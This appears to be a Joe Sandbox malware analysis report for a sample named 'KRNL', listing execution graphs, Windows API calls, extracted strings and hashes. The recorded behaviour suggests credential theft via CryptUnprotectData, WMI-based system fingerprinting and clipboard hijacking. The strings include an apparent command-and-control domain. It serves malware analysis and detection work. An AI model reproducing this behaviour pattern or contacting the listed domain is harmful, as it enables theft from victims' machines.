                                                                                                                                                                                                                                                          execution_graph 33930 4086c0 33931 4086cd 33930->33931 33932 4087f7 ExitProcess 33931->33932 33933 4087e0 33931->33933 33934 4086e2 GetCurrentProcessId GetCurrentThreadId SHGetSpecialFolderPathW 33931->33934 33935 4087e9 33933->33935 33936 408710 33934->33936 33949 43cca0 FreeLibrary 33935->33949 33936->33936 33945 43b180 33936->33945 33939 408749 GetForegroundWindow 33941 4087cf 33939->33941 33941->33933 33948 40cbe0 CoInitializeEx 33941->33948 33950 43e6b0 33945->33950 33947 43b18a RtlAllocateHeap 33947->33939 33949->33932 33951 43e6c0 33950->33951 33951->33947 33951->33951 33952 40e042 33956 409570 33952->33956 33954 40e04e CoUninitialize 33955 40e070 33954->33955 33957 409584 33956->33957 33957->33954 34185 43ce81 GetForegroundWindow 34186 43ceaa 34185->34186 33958 410247 33960 41025a 33958->33960 33959 40ea1d 33960->33959 33961 41048f RtlExpandEnvironmentStrings 33960->33961 33962 4104f6 33961->33962 33962->33959 33963 41057a RtlExpandEnvironmentStrings 33962->33963 33963->33959 33965 4105f1 33963->33965 33966 4148a0 33965->33966 33967 4148c0 33966->33967 33967->33967 33971 4400c0 33967->33971 33970 414a2d 33975 440400 LdrInitializeThunk 33970->33975 33972 4400e0 33971->33972 33972->33972 33973 4401fe 33972->33973 33976 43cd20 LdrInitializeThunk 33972->33976 33973->33970 33975->33970 33976->33973 33977 42b6c8 33978 42b6e3 33977->33978 33981 437960 33978->33981 33982 43796e 33981->33982 33985 437a52 33982->33985 33990 43cd20 LdrInitializeThunk 33982->33990 33984 42b827 33985->33984 33987 437b58 33985->33987 33989 43cd20 LdrInitializeThunk 33985->33989 33987->33984 33991 43cd20 LdrInitializeThunk 33987->33991 33989->33985 33990->33982 33991->33987 33992 58a1000 33993 58a1102 33992->33993 33994 58a1012 33992->33994 33995 58a103a OpenClipboard 33994->33995 33996 58a1030 Sleep 33994->33996 33997 58a104a GetClipboardData 33995->33997 33998 58a10f9 GetClipboardSequenceNumber 33995->33998 33996->33994 33999 58a105a GlobalLock 33997->33999 34000 58a10f3 CloseClipboard 33997->34000 33998->33994 33999->34000 34001 58a106b GlobalAlloc 33999->34001 34000->33998 34003 58a10e9 GlobalUnlock 34001->34003 34004 58a109d GlobalLock 34001->34004 34003->34000 34005 58a10b0 34004->34005 34006 58a10b9 GlobalUnlock 34005->34006 34007 58a10cb EmptyClipboard SetClipboardData 34006->34007 34008 58a10e0 GlobalFree 34006->34008 34007->34003 34007->34008 34008->34003 34009 42bb4d 34010 42bb80 34009->34010 34011 42bc8e 34010->34011 34013 43cd20 LdrInitializeThunk 34010->34013 34013->34011 34187 43328c 34188 433291 34187->34188 34189 4332c7 GetSystemMetrics GetSystemMetrics 34188->34189 34190 433306 34189->34190 34014 43b1d0 34015 43b1f0 34014->34015 34015->34015 34017 43b23e 34015->34017 34024 43cd20 LdrInitializeThunk 34015->34024 34016 43b421 34017->34016 34018 43b180 RtlAllocateHeap 34017->34018 34021 43b2d1 34018->34021 34023 43b33e 34021->34023 34025 43cd20 LdrInitializeThunk 34021->34025 34026 43b1a0 34023->34026 34024->34017 34025->34023 34027 43b1b3 34026->34027 34028 43b1c4 34026->34028 34029 43b1b8 RtlFreeHeap 34027->34029 34028->34016 34029->34028 34191 43fb10 34192 43fb1f 34191->34192 34193 43fc8f 34192->34193 34201 43cd20 LdrInitializeThunk 34192->34201 34194 43fee9 34193->34194 34195 43b180 RtlAllocateHeap 34193->34195 34197 43fd27 34195->34197 34199 43fdee 34197->34199 34202 43cd20 LdrInitializeThunk 34197->34202 34198 43b1a0 RtlFreeHeap 34198->34194 34199->34198 34201->34193 34202->34199 34203 40cc13 CoInitializeSecurity 34030 4404d0 34032 4404f0 34030->34032 34031 4405fe 34034 44054e 34032->34034 34036 43cd20 LdrInitializeThunk 34032->34036 34034->34031 34037 43cd20 LdrInitializeThunk 34034->34037 34036->34034 34037->34031 34038 42ebd5 CoSetProxyBlanket 34047 43d0d9 34048 43d0f0 34047->34048 34050 43d15e 34048->34050 34054 43cd20 LdrInitializeThunk 34048->34054 34053 43cd20 LdrInitializeThunk 34050->34053 34052 43d242 34053->34052 34054->34050 34204 43d81f 34205 43d830 34204->34205 34208 43cd20 LdrInitializeThunk 34205->34208 34207 43d99c 34208->34207 34209 4174a1 34211 417604 34209->34211 34212 417630 34209->34212 34213 4174ad 34209->34213 34211->34211 34211->34212 34215 41caa0 LdrInitializeThunk 34211->34215 34214 440250 LdrInitializeThunk 34213->34214 34214->34211 34215->34212 34056 40b262 34058 40b26e 34056->34058 34059 40b277 34056->34059 34057 43ccc0 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap 34057->34059 34059->34057 34059->34058 34060 42ce60 34061 42ce80 34060->34061 34062 42cf78 GetPhysicallyInstalledSystemMemory 34061->34062 34063 42cfb0 34062->34063 34063->34063 34216 420f20 34217 420f2e 34216->34217 34219 420f80 34216->34219 34220 421040 34217->34220 34221 421050 34220->34221 34221->34221 34222 440250 LdrInitializeThunk 34221->34222 34223 42113f 34222->34223 34224 426520 34225 426540 34224->34225 34227 42659e 34225->34227 34234 43cd20 LdrInitializeThunk 34225->34234 34226 426982 34227->34226 34229 43b180 RtlAllocateHeap 34227->34229 34231 426632 34229->34231 34230 43b1a0 RtlFreeHeap 34230->34226 34233 4266ae 34231->34233 34235 43cd20 LdrInitializeThunk 34231->34235 34233->34230 34234->34227 34235->34233 34064 40d263 34065 40d275 34064->34065 34068 437cf0 34065->34068 34067 40d313 34067->34067 34070 437d50 CoCreateInstance 34068->34070 34071 4381fe 34070->34071 34072 437e1e SysAllocString 34070->34072 34073 43820e GetVolumeInformationW 34071->34073 34075 437eb7 34072->34075 34082 438228 34073->34082 34076 437ebf CoSetProxyBlanket 34075->34076 34077 4381ed SysFreeString 34075->34077 34078 4381e3 34076->34078 34079 437edf SysAllocString 34076->34079 34077->34071 34078->34077 34081 437fb0 34079->34081 34081->34081 34083 437fea SysAllocString 34081->34083 34082->34067 34086 438011 34083->34086 34084 4381cb SysFreeString SysFreeString 34084->34078 34085 4381c1 34085->34084 34086->34084 34086->34085 34087 438059 VariantInit 34086->34087 34089 4380b0 34087->34089 34088 4381b0 VariantClear 34088->34085 34089->34088 34236 414e25 34237 414e30 34236->34237 34238 415037 CryptUnprotectData 34237->34238 34238->34237 34090 40e568 34091 40e56e 34090->34091 34094 4116a0 34091->34094 34093 40e577 34104 41172e 34094->34104 34095 41182c 34095->34093 34096 411d88 RtlExpandEnvironmentStrings 34096->34104 34097 41206f RtlExpandEnvironmentStrings 34097->34104 34098 41328c CreateThread 34098->34104 34099 4122c0 RtlExpandEnvironmentStrings 34099->34104 34102 43b1a0 RtlFreeHeap 34102->34104 34103 43cd20 LdrInitializeThunk 34103->34104 34104->34095 34104->34096 34104->34097 34104->34098 34104->34099 34104->34102 34104->34103 34105 43ff00 LdrInitializeThunk 34104->34105 34106 440650 LdrInitializeThunk 34104->34106 34105->34104 34106->34104 34107 435b68 34110 435b88 34107->34110 34108 435bf1 34110->34108 34111 43cd20 LdrInitializeThunk 34110->34111 34111->34110 34112 43d5e8 34114 43d4f2 34112->34114 34113 43d59e 34114->34113 34116 43cd20 LdrInitializeThunk 34114->34116 34116->34113 34239 436b2d 34240 436b45 34239->34240 34241 436b5e GetUserDefaultUILanguage 34240->34241 34242 436b77 34241->34242 34243 40a8b0 34246 40a8f0 34243->34246 34244 40accd 34245 43b1a0 RtlFreeHeap 34245->34244 34246->34244 34246->34245 34246->34246 34247 42bab3 34249 42babf 34247->34249 34248 42c96b GetComputerNameExA 34249->34248 34249->34249 34250 40d4b6 34251 40d55e 34250->34251 34252 40d53f 34250->34252 34252->34251 34254 43cd20 LdrInitializeThunk 34252->34254 34254->34251 34117 423675 34118 423a01 34117->34118 34119 423816 34117->34119 34121 423686 34117->34121 34123 4239b9 34117->34123 34125 4236be 34117->34125 34126 42383d 34117->34126 34140 421570 34118->34140 34119->34118 34119->34123 34119->34126 34122 42369c RtlExpandEnvironmentStrings 34121->34122 34122->34118 34122->34119 34122->34123 34122->34125 34122->34126 34123->34123 34124 423991 GetLogicalDrives 34127 440250 LdrInitializeThunk 34124->34127 34136 440250 34125->34136 34126->34124 34126->34126 34130 4239a8 34127->34130 34129 423d8a RtlExpandEnvironmentStrings 34129->34123 34129->34130 34132 424070 34129->34132 34130->34123 34130->34129 34130->34132 34169 43f450 RtlAllocateHeap RtlFreeHeap LdrInitializeThunk 34130->34169 34155 43f150 34132->34155 34137 440270 34136->34137 34138 4403ae 34137->34138 34170 43cd20 LdrInitializeThunk 34137->34170 34138->34119 34141 4400c0 LdrInitializeThunk 34140->34141 34143 4215b0 34141->34143 34142 421d72 34142->34123 34143->34142 34144 43b180 RtlAllocateHeap 34143->34144 34145 421612 34144->34145 34153 4216cb 34145->34153 34171 43cd20 LdrInitializeThunk 34145->34171 34147 421ca9 34148 43b1a0 RtlFreeHeap 34147->34148 34150 421cbb 34148->34150 34149 43b180 RtlAllocateHeap 34149->34153 34150->34142 34173 43cd20 LdrInitializeThunk 34150->34173 34153->34147 34153->34149 34154 43b1a0 RtlFreeHeap 34153->34154 34172 43cd20 LdrInitializeThunk 34153->34172 34154->34153 34156 43f160 34155->34156 34157 43f1be 34156->34157 34174 43cd20 LdrInitializeThunk 34156->34174 34158 4240a3 34157->34158 34160 43b180 RtlAllocateHeap 34157->34160 34158->34123 34165 43f040 34158->34165 34161 43f280 34160->34161 34164 43f30f 34161->34164 34175 43cd20 LdrInitializeThunk 34161->34175 34162 43b1a0 RtlFreeHeap 34162->34158 34164->34162 34167 43f060 34165->34167 34166 43f11f 34166->34123 34167->34166 34176 43cd20 LdrInitializeThunk 34167->34176 34169->34130 34170->34138 34171->34145 34172->34153 34173->34150 34174->34157 34175->34164 34176->34166 34177 4330fd 34178 433115 34177->34178 34181 4336e0 34178->34181 34182 433719 GetObjectW 34181->34182 34184 43380d 34182->34184

                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                          Function 00423675 Relevance: 51.8, APIs: 3, Strings: 26, Instructions: 1032COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 0 423675-42367f 1 4236d0 0->1 2 423a01-423a9a 0->2 3 423686-42368a 0->3 4 4239f7-423a00 0->4 5 4236c4-4236cf call 407fa0 0->5 6 423825-423836 0->6 7 4236d8-4236df 0->7 8 4239c9 0->8 9 4239b9-4239c1 0->9 10 4236be 0->10 11 42383d-42384a 0->11 1->7 12 423aa0-423ab8 2->12 18 423693 3->18 19 42368c-423691 3->19 5->1 6->2 6->8 6->9 6->11 15 423ad4-423ae8 6->15 16 423c1b 6->16 17 4239cf-4239db call 407fa0 6->17 13 4236e1-4236e6 7->13 14 4236e8 7->14 9->8 10->5 20 423853 11->20 21 42384c-423851 11->21 12->12 25 423aba-423ac4 call 421570 12->25 23 4236ef-42372a call 407f90 13->23 14->23 28 423af0-423b34 15->28 43 4239e4 17->43 26 423696-4236b7 call 407f90 RtlExpandEnvironmentStrings 18->26 19->26 27 42385a-4238f2 call 407f90 20->27 21->27 41 423730-42379d 23->41 37 423ac9-423acc 25->37 26->1 26->2 26->4 26->5 26->6 26->7 26->8 26->9 26->10 26->11 42 423900-42392d 27->42 28->28 35 423b36-423ba9 28->35 40 423bb0-423bf5 35->40 37->15 40->40 44 423bf7-423c12 call 421190 40->44 41->41 45 42379f-4237ab 41->45 42->42 46 42392f-423938 42->46 52 4239ea-4239f4 call 407fa0 43->52 44->16 48 4237d1-4237e2 45->48 49 4237ad-4237b3 45->49 50 423961-42396c 46->50 51 42393a-423942 46->51 55 423803 48->55 56 4237e4-4237ea 48->56 54 4237c0-4237cf 49->54 59 423991-4239b2 GetLogicalDrives call 440250 50->59 60 42396e-423971 50->60 58 423950-42395f 51->58 52->4 54->48 54->54 61 423806-423811 call 440250 55->61 64 4237f0-4237ff 56->64 58->50 58->58 59->4 59->8 59->9 59->15 59->16 59->17 59->43 59->52 70 423d72-423d78 59->70 71 423c21-423c2d call 407fa0 59->71 62 423980-42398f 60->62 69 423816-42381e 61->69 62->59 62->62 64->64 67 423801 64->67 67->61 69->2 69->6 69->8 69->9 69->11 69->15 69->17 73 423d81 70->73 74 423d7a-423d7f 70->74 71->70 75 423d84-423da4 call 407f90 RtlExpandEnvironmentStrings 73->75 74->75 79 423ff0-423ff2 75->79 80 424070-42407d 75->80 81 423ea6-423eb0 75->81 82 423ff7-424014 75->82 83 423db5-423def 75->83 84 423fc5-423fe9 call 43f450 75->84 85 423dab-423dad 75->85 86 42401b-42402d 75->86 87 423e99-423ea4 call 407fa0 75->87 89 4256bf-4256c8 79->89 92 424084-4240ae call 407f90 call 43f150 80->92 93 42407f 80->93 82->80 82->86 91 423df0-423e33 83->91 84->79 84->80 84->82 84->86 85->83 86->70 86->79 86->80 86->81 86->82 86->83 86->84 86->85 86->86 86->87 90 424060-424069 86->90 87->81 90->80 90->86 91->91 97 423e35-423e91 call 41f430 91->97 104 4240e3 92->104 105 4240c0-4240cf call 43f040 92->105 106 4240f0-42428f 92->106 107 4240b5 92->107 93->92 97->87 104->106 110 4240d4-4240dc 105->110 109 424290-4242ba 106->109 107->105 109->109 111 4242bc-424535 109->111 110->104 110->106 112 424540-424571 111->112 112->112 113 424573-42473b 112->113 114 424740-42476c 113->114 114->114 115 42476e-42493f 114->115 116 424940-424969 115->116 116->116 117 42496b-424b3f 116->117 118 424b40-424b70 117->118 118->118 119 424b72-424be0 118->119 119->89
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000), ref: 004236A9
                                                                                                                                                                                                                                                          • GetLogicalDrives.KERNEL32 ref: 00423996
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DrivesEnvironmentExpandLogicalStrings
                                                                                                                                                                                                                                                          • String ID: 9$&Kt0$)mOm$45$<$>>$AQ$Hmkm$PR$Vq$Vq$XH$Ys$\\$_p$bmdm$bo$ef$fmkm$mm$pmrm$rl$wY$|i$|s$\a
                                                                                                                                                                                                                                                          • API String ID: 1595903574-2236109924
                                                                                                                                                                                                                                                          • Opcode ID: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                                          • Instruction ID: 2fc2160d72e1542a336960e5481f9d0735e9c35b6a9b6e11306a6587d30006f6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bdc2e361060c2e60b1b8bcc2cdb8b3bfd283e30f55f17195bd23cc72b47b61d2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A2B7B9D11229DBDB20DF18DC8529EBB71FF95304F1086E9C8596B350E7389A81CF86
                                                                                                                                                                                                                                                          Function 0040CC75 Relevance: 30.2, Strings: 24, Instructions: 243COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 120 40cc75-40cc9a call 408630 123 40cca0-40cd04 120->123 123->123 124 40cd06-40cd6f 123->124 125 40cd70-40cd9c 124->125 125->125 126 40cd9e-40cdaf 125->126 127 40cdb1-40cdb8 126->127 128 40cdcb-40cdd7 126->128 129 40cdc0-40cdc9 127->129 130 40cdd9-40cdda 128->130 131 40cdeb-40cdf8 128->131 129->128 129->129 132 40cde0-40cde9 130->132 133 40cdfa-40ce01 131->133 134 40ce1b-40ce23 131->134 132->131 132->132 137 40ce10-40ce19 133->137 135 40ce25-40ce26 134->135 136 40ce3b-40cf53 134->136 138 40ce30-40ce39 135->138 139 40cf60-40cf80 136->139 137->134 137->137 138->136 138->138 139->139 140 40cf82-40cfaf 139->140 141 40cfb0-40cfd6 140->141 141->141 142 40cfd8-40d008 call 40b640 141->142 144 40d00d-40d037 142->144
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 0h+h$<h7h$ChYh$Ehph$FhFh$HhPh$Kh^h$RhTh$Rhvh$Xh h$^hYh$`h,h$ehdh$fhch$hh(h$lev-tolstoi.com$ohuh$ph8h$shoh$uheh$uhjh$vh}h$xhdh$yhrh
                                                                                                                                                                                                                                                          • API String ID: 0-3555453935
                                                                                                                                                                                                                                                          • Opcode ID: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
                                                                                                                                                                                                                                                          • Instruction ID: 8753c489787e8cef6e0b2d778e15f4088c0b1d051e6c25f020ec618a161c42f3
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a9fbf59f452024c383559b785281fa2e80acd9a431c8eb1751f95ce11aa3c8a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C81F1B190D3D08AD7308F29D98979BBBE1EFC6300F554A6DC1C86B250EB7A0516CB96
                                                                                                                                                                                                                                                          Function 00437CF0 Relevance: 28.6, APIs: 11, Strings: 5, Instructions: 574memorycomCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 145 437cf0-437d43 146 437d50-437d9d 145->146 146->146 147 437d9f-437dbd 146->147 149 437dca-437e18 CoCreateInstance 147->149 150 437dbf 147->150 151 4381fe-438226 call 43ea60 GetVolumeInformationW 149->151 152 437e1e-437e52 149->152 150->149 157 438230-438232 151->157 158 438228-43822c 151->158 154 437e60-437e90 152->154 154->154 156 437e92-437eb9 SysAllocString 154->156 161 437ebf-437ed9 CoSetProxyBlanket 156->161 162 4381ed-4381fa SysFreeString 156->162 159 438257-438262 157->159 158->157 163 438264-43826b 159->163 164 43826e-438282 159->164 165 4381e3-4381e9 161->165 166 437edf-437ef5 161->166 162->151 163->164 167 438290-4382c5 164->167 165->162 168 437f00-437f28 166->168 167->167 169 4382c7-438306 167->169 168->168 170 437f2a-437fa6 SysAllocString 168->170 171 438310-438384 169->171 172 437fb0-437fe8 170->172 171->171 173 438386-4383c1 call 41e1e0 171->173 172->172 174 437fea-438017 SysAllocString 172->174 177 4383d0-4383d8 173->177 180 4381cb-4381dc SysFreeString * 2 174->180 181 43801d-43803f 174->181 177->177 179 4383da-4383dc 177->179 182 4383e2-4383f2 call 408130 179->182 183 438240-438251 179->183 180->165 188 4381c1-4381c7 181->188 189 438045-438048 181->189 182->183 183->159 185 4383f7-4383fe 183->185 188->180 189->188 190 43804e-438053 189->190 190->188 191 438059-4380a4 VariantInit 190->191 192 4380b0-4380db 191->192 192->192 193 4380dd-4380ef 192->193 194 4380f3-4380f5 193->194 195 4381b0-4381bd VariantClear 194->195 196 4380fb-438101 194->196 195->188 196->195 197 438107-438115 196->197 198 438117-43811c 197->198 199 43814d 197->199 200 43812c-438130 198->200 201 43814f-43817e call 407f90 call 408c70 199->201 202 438132-43813b 200->202 203 438120 200->203 212 438180-43818a 201->212 213 43819f-4381ac call 407fa0 201->213 206 438142-438146 202->206 207 43813d-438140 202->207 205 438121-43812a 203->205 205->200 205->201 206->205 210 438148-43814b 206->210 207->205 210->205 212->213 214 43818c-438196 212->214 213->195 214->213 216 438198-43819b 214->216 216->213
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437E10
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32([d), ref: 00437E93
                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00437ED1
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(!,.,), ref: 00437F2F
                                                                                                                                                                                                                                                          • SysAllocString.OLEAUT32(B6ABB756), ref: 00437FEF
                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 0043805E
                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 004381B1
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32 ref: 004381D4
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(?), ref: 004381DA
                                                                                                                                                                                                                                                          • SysFreeString.OLEAUT32(00000000), ref: 004381EE
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                          • String ID: ,,Y,$C$W;$[d$\
                                                                                                                                                                                                                                                          • API String ID: 2485776651-2867424240
                                                                                                                                                                                                                                                          • Opcode ID: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
                                                                                                                                                                                                                                                          • Instruction ID: 3d09bc75159cb0bc0addfeff3c9f402bb7feac1769e375c6bd2c7d3d39127c8e
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 44b9128bec2104e14614ee01767a834835cc461376388db997f909470237cd48
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD02BA766083009FE710DF65C884B6BBBE5EFC9710F14882EF5959B3A0DB79E8018B56
                                                                                                                                                                                                                                                          Function 058A1000 Relevance: 19.6, APIs: 13, Instructions: 81clipboardsleepmemoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000001), ref: 058A1032
                                                                                                                                                                                                                                                          • OpenClipboard.USER32(00000000), ref: 058A103C
                                                                                                                                                                                                                                                          • GetClipboardData.USER32(0000000D), ref: 058A104C
                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32(00000000), ref: 058A105D
                                                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 058A1090
                                                                                                                                                                                                                                                          • GlobalLock.KERNEL32 ref: 058A10A0
                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32 ref: 058A10C1
                                                                                                                                                                                                                                                          • EmptyClipboard.USER32 ref: 058A10CB
                                                                                                                                                                                                                                                          • SetClipboardData.USER32(0000000D), ref: 058A10D6
                                                                                                                                                                                                                                                          • GlobalFree.KERNEL32 ref: 058A10E3
                                                                                                                                                                                                                                                          • GlobalUnlock.KERNEL32(?), ref: 058A10ED
                                                                                                                                                                                                                                                          • CloseClipboard.USER32 ref: 058A10F3
                                                                                                                                                                                                                                                          • GetClipboardSequenceNumber.USER32 ref: 058A10F9
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2916221258.00000000058A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 058A0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2916206230.00000000058A0000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2916236023.00000000058A2000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_58a0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1416286485-0
                                                                                                                                                                                                                                                          • Opcode ID: d8020062fc07a51c21c6fc66c8fdec1c339669c5555f250f16fb657dfd1376b3
                                                                                                                                                                                                                                                          • Instruction ID: 1829eb1541578f15eba19ce2534b06e6051a366bf1a8796bd0e513d3115946c5
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8020062fc07a51c21c6fc66c8fdec1c339669c5555f250f16fb657dfd1376b3
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4221833A614250ABF7302B75AC0EB6A7BA9FF05786F040438FD47D6160EF61AC10C7A1
                                                                                                                                                                                                                                                          Function 00410247 Relevance: 13.0, APIs: 2, Strings: 5, Instructions: 700COMMON
                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                          control_flow_graph 240 410247-4102ff call 413cd0 * 2 call 401870 call 413cd0 * 2 call 401870 253 410301-41032c call 413820 240->253 254 410303-410306 240->254 261 410330-4103ba call 407f90 call 40a640 call 401870 253->261 262 41032e 253->262 256 410c7e 254->256 258 4115fb 256->258 260 4115fd-411685 call 401f30 258->260 268 40ea30-40eaa2 call 401f40 call 401e30 260->268 269 40ea29-411696 260->269 279 4103bc 261->279 280 4103be-410402 call 413820 261->280 262->261 283 40eaa4-40eb2c call 413cd0 * 4 call 401970 268->283 284 40eaa6 268->284 281 410438-410460 call 413820 279->281 288 410404 280->288 289 410406-410436 call 407f90 call 40a640 280->289 293 410462 281->293 294 410464-4104f4 call 407f90 call 40a640 RtlExpandEnvironmentStrings 281->294 283->258 319 40eb32 283->319 284->260 288->289 289->281 293->294 307 4104f6-4104f9 294->307 309 4104fb-41052a 307->309 310 41052c-410535 307->310 309->307 313 410552-41056e 310->313 314 410537-41054d call 407fa0 310->314 317 410570 313->317 318 410572-4105c8 call 407f90 RtlExpandEnvironmentStrings 313->318 314->256 317->318 325 4105f1-410658 call 407fa0 call 401870 318->325 326 4105ca-4105ec call 407fa0 * 2 318->326 319->258 338 4106a8-41070d call 401b80 325->338 339 41065a-41067b call 413820 325->339 341 410c7c 326->341 345 41070f-410712 338->345 346 41067d 339->346 347 41067f-4106a3 call 407f90 call 40a640 339->347 341->256 349 4107a5-4107c5 call 401a80 345->349 350 410718-4107a0 345->350 346->347 347->338 355 410b4b-410bc9 call 4089c0 call 4148a0 349->355 356 4107cb-410803 call 401f30 349->356 350->345 365 410bce-410bdd call 409570 355->365 362 410805 356->362 363 410807-41082d call 407f90 356->363 362->363 368 41085a-41085e 363->368 369 41082f-410836 363->369 373 410c1f-410c50 call 407fa0 * 2 365->373 374 410bdf-410bf2 365->374 372 410860-410862 368->372 371 410838-410844 call 413960 369->371 387 410846-410858 371->387 377 410864 372->377 378 410869-4108a2 call 401f40 372->378 404 410c63-410c66 373->404 405 410c52-410c5e call 407fa0 373->405 379 410bf4 374->379 380 410c0d-410c18 call 407fa0 374->380 377->355 392 4108a4-4108a7 378->392 385 410bf6-410c07 call 413b00 379->385 380->373 394 410c09 385->394 395 410c0b 385->395 387->368 397 4108e4-410922 call 401870 392->397 398 4108a9-4108e2 392->398 394->385 395->380 403 410929-41092c 397->403 398->392 408 410953-41098f call 401870 403->408 409 41092e-410951 403->409 406 410c70-410c77 call 408aa0 404->406 407 410c68-410c6b call 407fa0 404->407 405->404 406->341 407->406 416 410991-410994 408->416 409->403 417 410996-4109b9 416->417 418 4109bb-4109f8 call 401b80 416->418 417->416 421 4109fa-4109fd 418->421 422 410a03-410ad5 421->422 423 410ada-410b46 call 401b80 call 413980 421->423 422->421 423->372
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL ref: 004104C9
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL ref: 004105C0
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
